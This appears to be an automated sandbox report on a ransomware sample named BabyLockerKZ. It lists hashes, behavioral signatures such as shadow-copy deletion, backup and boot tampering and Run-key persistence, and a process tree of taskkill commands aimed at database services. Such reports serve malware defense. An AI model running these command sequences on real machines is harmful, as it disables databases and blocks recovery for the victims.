Analysis
-
max time kernel
164s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
27-02-2024 18:03
Static task
static1
Behavioral task
behavioral1
Sample
f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
Resource
win10v2004-20240226-en
General
-
Target
f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
-
Size
419KB
-
MD5
17073229079e31a3190e7a8509302b22
-
SHA1
6ed12dade62a8e420c5b5b295ddd6c4ce83b9549
-
SHA256
f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c
-
SHA512
7afe620f907740393f021fcd337aaf5ed8b5e903aab3ed592d8695a1d877e41094bbc9aca20e8062c11acf2e288bd96033ffa08544d926be5493be26cb79c647
-
SSDEEP
6144:4CmPvkrISw8ZMQsFMFEXmtT+n4CQi2oD9HoZwIYaTR/dXszI2lUC4c:L3W6MoFlV+n4CQRoD9IygT/L
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4100 created 3560 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 49 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 3448 bcdedit.exe 1180 bcdedit.exe -
Renames multiple (142) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 4904 wbadmin.exe -
pid Process 464 wbadmin.exe -
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe\"" f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe\"" f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe -
Enumerates connected drives 3 TTPs 26 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\K: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe File opened (read-only) \??\X: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe File opened (read-only) \??\Y: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe File opened (read-only) \??\A: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe File opened (read-only) \??\I: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe File opened (read-only) \??\P: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe File opened (read-only) \??\Q: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe File opened (read-only) \??\U: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe File opened (read-only) \??\Z: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe File opened (read-only) \??\J: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe File opened (read-only) \??\L: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe File opened (read-only) \??\N: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe File opened (read-only) \??\B: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe File opened (read-only) \??\M: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe File opened (read-only) \??\O: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe File opened (read-only) \??\R: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe File opened (read-only) \??\W: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe File opened (read-only) \??\F: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe File opened (read-only) \??\E: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe File opened (read-only) \??\H: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe File opened (read-only) \??\S: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe File opened (read-only) \??\T: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe File opened (read-only) \??\V: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe File opened (read-only) \??\F: cipher.exe File opened (read-only) \??\A: cipher.exe File opened (read-only) \??\G: f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2416 vssadmin.exe -
Kills process with taskkill 14 IoCs
pid Process 3872 taskkill.exe 2332 taskkill.exe 744 taskkill.exe 4528 taskkill.exe 4328 taskkill.exe 4004 taskkill.exe 840 taskkill.exe 732 taskkill.exe 3640 taskkill.exe 4508 taskkill.exe 1772 taskkill.exe 1840 taskkill.exe 464 taskkill.exe 3780 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1904519900-954640453-4250331663-1000\{4AAAABBC-0BF1-46C1-9B2D-C2D690E523B7} explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ explorer.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe -
Suspicious use of AdjustPrivilegeToken 50 IoCs
description pid Process Token: SeDebugPrivilege 732 taskkill.exe Token: SeDebugPrivilege 464 taskkill.exe Token: SeDebugPrivilege 4528 taskkill.exe Token: SeDebugPrivilege 3640 taskkill.exe Token: SeDebugPrivilege 4004 taskkill.exe Token: SeDebugPrivilege 4328 taskkill.exe Token: SeDebugPrivilege 840 taskkill.exe Token: SeDebugPrivilege 3872 taskkill.exe Token: SeDebugPrivilege 2332 taskkill.exe Token: SeDebugPrivilege 744 taskkill.exe Token: SeDebugPrivilege 4508 taskkill.exe Token: SeDebugPrivilege 3780 taskkill.exe Token: SeIncreaseQuotaPrivilege 3028 WMIC.exe Token: SeSecurityPrivilege 3028 WMIC.exe Token: SeTakeOwnershipPrivilege 3028 WMIC.exe Token: SeLoadDriverPrivilege 3028 WMIC.exe Token: SeSystemProfilePrivilege 3028 WMIC.exe Token: SeSystemtimePrivilege 3028 WMIC.exe Token: SeProfSingleProcessPrivilege 3028 WMIC.exe Token: SeIncBasePriorityPrivilege 3028 WMIC.exe Token: SeCreatePagefilePrivilege 3028 WMIC.exe Token: SeBackupPrivilege 3028 WMIC.exe Token: SeRestorePrivilege 3028 WMIC.exe Token: SeShutdownPrivilege 3028 WMIC.exe Token: SeDebugPrivilege 3028 WMIC.exe Token: SeSystemEnvironmentPrivilege 3028 WMIC.exe Token: SeRemoteShutdownPrivilege 3028 WMIC.exe Token: SeUndockPrivilege 3028 WMIC.exe Token: SeManageVolumePrivilege 3028 WMIC.exe Token: 33 3028 WMIC.exe Token: 34 3028 WMIC.exe Token: 35 3028 WMIC.exe Token: 36 3028 WMIC.exe Token: SeBackupPrivilege 940 vssvc.exe Token: SeRestorePrivilege 940 vssvc.exe Token: SeAuditPrivilege 940 vssvc.exe Token: SeShutdownPrivilege 5300 explorer.exe Token: SeCreatePagefilePrivilege 5300 explorer.exe Token: SeShutdownPrivilege 5300 explorer.exe Token: SeCreatePagefilePrivilege 5300 explorer.exe Token: SeShutdownPrivilege 5300 explorer.exe Token: SeCreatePagefilePrivilege 5300 explorer.exe Token: SeShutdownPrivilege 5300 explorer.exe Token: SeCreatePagefilePrivilege 5300 explorer.exe Token: SeShutdownPrivilege 5300 explorer.exe Token: SeCreatePagefilePrivilege 5300 explorer.exe Token: SeShutdownPrivilege 5300 explorer.exe Token: SeCreatePagefilePrivilege 5300 explorer.exe Token: SeShutdownPrivilege 5300 explorer.exe Token: SeCreatePagefilePrivilege 5300 explorer.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 5300 explorer.exe 5300 explorer.exe 5300 explorer.exe 5300 explorer.exe 5300 explorer.exe 5300 explorer.exe -
Suspicious use of SendNotifyMessage 8 IoCs
pid Process 5300 explorer.exe 5300 explorer.exe 5300 explorer.exe 5300 explorer.exe 5300 explorer.exe 5300 explorer.exe 5300 explorer.exe 5300 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4100 wrote to memory of 620 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 92 PID 4100 wrote to memory of 620 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 92 PID 4100 wrote to memory of 620 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 92 PID 620 wrote to memory of 1604 620 cmd.exe 96 PID 620 wrote to memory of 1604 620 cmd.exe 96 PID 4100 wrote to memory of 3248 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 97 PID 4100 wrote to memory of 3248 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 97 PID 4100 wrote to memory of 3248 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 97 PID 3248 wrote to memory of 3872 3248 cmd.exe 100 PID 3248 wrote to memory of 3872 3248 cmd.exe 100 PID 3872 wrote to memory of 732 3872 cmd.exe 101 PID 3872 wrote to memory of 732 3872 cmd.exe 101 PID 4100 wrote to memory of 3876 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 104 PID 4100 wrote to memory of 3876 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 104 PID 4100 wrote to memory of 3876 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 104 PID 3876 wrote to memory of 2652 3876 cmd.exe 106 PID 3876 wrote to memory of 2652 3876 cmd.exe 106 PID 2652 wrote to memory of 1840 2652 cmd.exe 107 PID 2652 wrote to memory of 1840 2652 cmd.exe 107 PID 4100 wrote to memory of 3320 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 108 PID 4100 wrote to memory of 3320 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 108 PID 4100 wrote to memory of 3320 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 108 PID 3320 wrote to memory of 1600 3320 cmd.exe 110 PID 3320 wrote to memory of 1600 3320 cmd.exe 110 PID 1600 wrote to memory of 464 1600 cmd.exe 111 PID 1600 wrote to memory of 464 1600 cmd.exe 111 PID 4100 wrote to memory of 2868 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 112 PID 4100 wrote to memory of 2868 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 112 PID 4100 wrote to memory of 2868 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 112 PID 2868 wrote to memory of 844 2868 cmd.exe 114 PID 2868 wrote to memory of 844 2868 cmd.exe 114 PID 844 wrote to memory of 4528 844 cmd.exe 115 PID 844 wrote to memory of 4528 844 cmd.exe 115 PID 4100 wrote to memory of 3276 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 116 PID 4100 wrote to memory of 3276 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 116 PID 4100 wrote to memory of 3276 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 116 PID 3276 wrote to memory of 4800 3276 cmd.exe 118 PID 3276 wrote to memory of 4800 3276 cmd.exe 118 PID 4800 wrote to memory of 3640 4800 cmd.exe 119 PID 4800 wrote to memory of 3640 4800 cmd.exe 119 PID 4100 wrote to memory of 4928 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 120 PID 4100 wrote to memory of 4928 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 120 PID 4100 wrote to memory of 4928 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 120 PID 4928 wrote to memory of 1176 4928 cmd.exe 122 PID 4928 wrote to memory of 1176 4928 cmd.exe 122 PID 1176 wrote to memory of 4004 1176 cmd.exe 123 PID 1176 wrote to memory of 4004 1176 cmd.exe 123 PID 4100 wrote to memory of 4500 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 124 PID 4100 wrote to memory of 4500 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 124 PID 4100 wrote to memory of 4500 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 124 PID 4500 wrote to memory of 4452 4500 cmd.exe 126 PID 4500 wrote to memory of 4452 4500 cmd.exe 126 PID 4452 wrote to memory of 4328 4452 cmd.exe 127 PID 4452 wrote to memory of 4328 4452 cmd.exe 127 PID 4100 wrote to memory of 1856 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 128 PID 4100 wrote to memory of 1856 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 128 PID 4100 wrote to memory of 1856 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 128 PID 1856 wrote to memory of 1300 1856 cmd.exe 130 PID 1856 wrote to memory of 1300 1856 cmd.exe 130 PID 1300 wrote to memory of 840 1300 cmd.exe 131 PID 1300 wrote to memory of 840 1300 cmd.exe 131 PID 4100 wrote to memory of 5032 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 133 PID 4100 wrote to memory of 5032 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 133 PID 4100 wrote to memory of 5032 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe 133 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe"C:\Users\Admin\AppData\Local\Temp\f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Adds Run key to start application
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4100 -
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"2⤵
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c rem Kill "SQL"3⤵PID:1604
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3248 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\system32\taskkill.exetaskkill -f -im sqlbrowser.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:732
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3876 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe3⤵
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\system32\taskkill.exetaskkill -f -im sql writer.exe4⤵
- Kills process with taskkill
PID:1840
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3320 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe3⤵
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Windows\system32\taskkill.exetaskkill -f -im sqlserv.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:464
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe3⤵
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Windows\system32\taskkill.exetaskkill -f -im msmdsrv.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4528
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3276 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Windows\system32\taskkill.exetaskkill -f -im MsDtsSrvr.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3640 -
C:\Windows\system32\taskkill.exetaskkill -f -im pg_ctl.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3780
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe3⤵
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Windows\system32\taskkill.exetaskkill -f -im sqlceip.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4004
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4500 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Windows\system32\taskkill.exetaskkill -f -im fdlauncher.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4328
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe3⤵
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\system32\taskkill.exetaskkill -f -im Ssms.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:840
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE2⤵PID:5032
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE3⤵PID:4880
-
C:\Windows\system32\taskkill.exetaskkill -f -im SQLAGENT.EXE4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3872
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe2⤵PID:2192
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe3⤵PID:2652
-
C:\Windows\system32\taskkill.exetaskkill -f -im fdhost.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe2⤵PID:3804
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe3⤵PID:2416
-
C:\Windows\system32\taskkill.exetaskkill -f -im ReportingServicesService.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:744
-
-
-
-
